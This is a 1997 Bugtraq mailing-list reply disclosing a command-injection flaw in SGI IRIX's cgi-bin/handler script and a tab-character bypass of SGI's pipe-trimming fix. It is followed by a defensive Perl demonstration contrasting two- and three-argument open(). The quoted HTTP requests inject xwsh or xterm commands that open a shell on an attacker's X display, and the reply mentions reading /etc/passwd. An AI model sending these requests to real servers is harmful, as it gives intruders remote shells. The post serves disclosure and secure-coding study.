Bugtraq mailing list archives
Re: CPSR 7: IRIX WWW Server
From: lamontg () hitl washington edu (Lamont Granquist)
Date: Thu, 24 Jul 1997 14:15:20 -0700
On Thu, 24 Jul 1997, Thomas Walter wrote:
> Trying 1.2.3.4...
> Connected to victim.
> Escape character is '^]'.
> GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e /bin/csh|?data=Download
> UX:sh (sh): ERROR:
> Connection closed by foreign host.
> enemy%
s/xwsh/xterm/ and this works the same.

to reiterate Razvan's follow-up to the original posting on the cgi-bin/handler issue, in Irix 6.3 (O2s) they attempted to fix this with the line:

    # trim off trailing pipes
    $doc =~ s/\|*$// ;

which can be fooled by appending a <tab> char after the pipe, thus:

    GET /cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab>
    /bin/sh|<tab>?data=Download
           ^^^^^^
    (one line, emphasis under the necessary change)

which can be applied to the xwsh, or cat /etc/passwd attacks or whatever. this is not matched by the pattern s/\|*$//, but the appended tab does not change the behavior of perl's open(yadda, "yadda|") statement since whitespace following the '|' is ignored.

Yuri's post to Bugtraq of Fri, 16 May 1997 #2551 at http://www.netspace.org/lsv-archive/bugtraq.html is a good read for more info on why SGI's /var/www/cgi-bin directory should be nuked with extreme prejudice...

--
Lamont Granquist <lamontg () hitl washington edu> (206)616-1469 fax:(206)543-5380
Human Interface Technology Lab. University of Washington. Seattle, WA
PGP pubkey: finger lamontg () near hitl washington edu
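
Added example, not part of the original post and not SGI's handler code: the filter line quoted above, run against two constructed names, with two-argument open() beside the three-argument form that never parses the name for a pipe. The helper names are hypothetical, `echo` stands in for any command, and a Unix-like system with `echo` on the PATH is assumed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# The IRIX 6.3 filter as quoted in the post: it removes '|' characters
# only when they are the very last characters of the string.
sub trim_pipes_63 {
    my ($doc) = @_;
    $doc =~ s/\|*$//;
    return $doc;
}

# Deliberately the unsafe form: two-argument open() strips trailing
# whitespace and then treats a trailing '|' as "read from this command".
# Returns the first line the command printed, or undef if nothing opened.
sub two_arg_open_output {
    my ($name) = @_;
    open(my $fh, $name) or return;
    my $line = <$fh>;
    close $fh;
    return $line;
}

# Hardened form: the explicit '<' mode makes open() take the name as a
# literal file name, so '|' and surrounding whitespace have no meaning.
sub three_arg_open_ok {
    my ($name) = @_;
    return open(my $fh, '<', $name) ? 1 : 0;
}

# Constructed sample names: a bare trailing pipe, and pipe followed by a tab.
for my $doc ("echo EXECUTED|", "echo EXECUTED|\t") {
    my $filtered = trim_pipes_63($doc);
    my $out      = two_arg_open_output($filtered);

    # Make the tab visible when printing the names.
    (my $in_shown   = $doc)      =~ s/\t/<tab>/g;
    (my $filt_shown = $filtered) =~ s/\t/<tab>/g;

    printf "input [%s] -> filtered [%s]\n", $in_shown, $filt_shown;
    printf "  2-arg open: %s\n",
        defined $out ? "command ran" : "no command ran";
    printf "  3-arg open: %s\n",
        three_arg_open_ok($filtered) ? "opened a file" : "no such file, nothing ran";
}
```

The same check applies when auditing other Perl CGI scripts: any open() call with two arguments and a request-derived name is a candidate for this problem, whatever filtering precedes it.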